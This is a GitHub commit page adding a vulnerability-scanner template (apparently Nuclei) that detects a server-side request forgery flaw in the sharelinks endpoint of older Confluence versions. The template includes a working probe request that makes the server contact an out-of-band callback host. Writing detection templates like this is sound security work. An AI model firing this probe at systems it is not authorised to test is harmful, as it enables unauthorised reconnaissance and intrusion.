Merge pull request #1697 from Techbrunch/confluence-ssrf-sharelinks

Add Confluence SSRF in sharelinks
patch-1
Sandeep Singh 2021-06-14 20:52:36 +05:30 committed by GitHub
commit e4599e92d3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: confluence-ssrf-sharelinks
info:
name: Confluence SSRF in sharelinks
author: TechbrunchFR
severity: medium
description: Vulnerable should be Confluence versions released from 2016 November and older
reference: |
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
- https://github.com/assetnote/blind-ssrf-chains#confluence
tags: confluence,atlassian,ssrf,jira
requests:
- method: GET
path:
- '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"